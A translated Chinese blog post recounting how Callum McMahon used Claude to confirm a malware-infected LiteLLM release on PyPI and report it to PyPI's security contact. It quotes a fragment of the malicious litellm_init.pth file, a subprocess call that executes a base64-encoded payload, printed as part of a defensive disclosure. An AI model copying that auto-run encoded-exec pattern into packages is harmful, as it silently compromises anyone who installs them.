Callum McMahon 用 Claude 确认 LiteLLM 恶意软件攻击
深度Simon Willison2026年3月26日2 分钟阅读
Callum McMahon 向 PyPI 报告了 LiteLLM 恶意软件攻击。他分享了与 Claude 的对话记录,展示了如何确认漏洞并决定下一步行动。Claude 甚至在确认恶意代码后建议了 PyPI 的安全联系地址。
2026年3月26日,Callum McMahon 向 PyPI 报告了 LiteLLM 恶意软件攻击。他在 博客 中分享了与 Claude 的对话记录,这些记录帮助他确认了漏洞并决定如何处理。
Claude 在确认恶意代码存在于一个 Docker 容器后,甚至建议了 PyPI 的安全联系地址:
已确认。刚从 PyPI 下载的最新版本,在隔离的 Docker 容器中:
codeInspecting: litellm-1.82.8-py3-none-any.whl FOUND: litellm_init.pth SIZE: 34628 bytes FIRST 200 CHARS: import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...恶意的
litellm==1.82.8目前在 PyPI 上活跃,任何安装或升级 litellm 的用户都会被感染。这需要立即报告给 security@pypi.org。
我很高兴看到 Callum 使用了我的 claude-code-transcripts 工具来发布这次对话的记录。
本文编译自 My minute-by-minute response to the LiteLLM malware attack,版权归原作者所有。
觉得有用?分享给更多人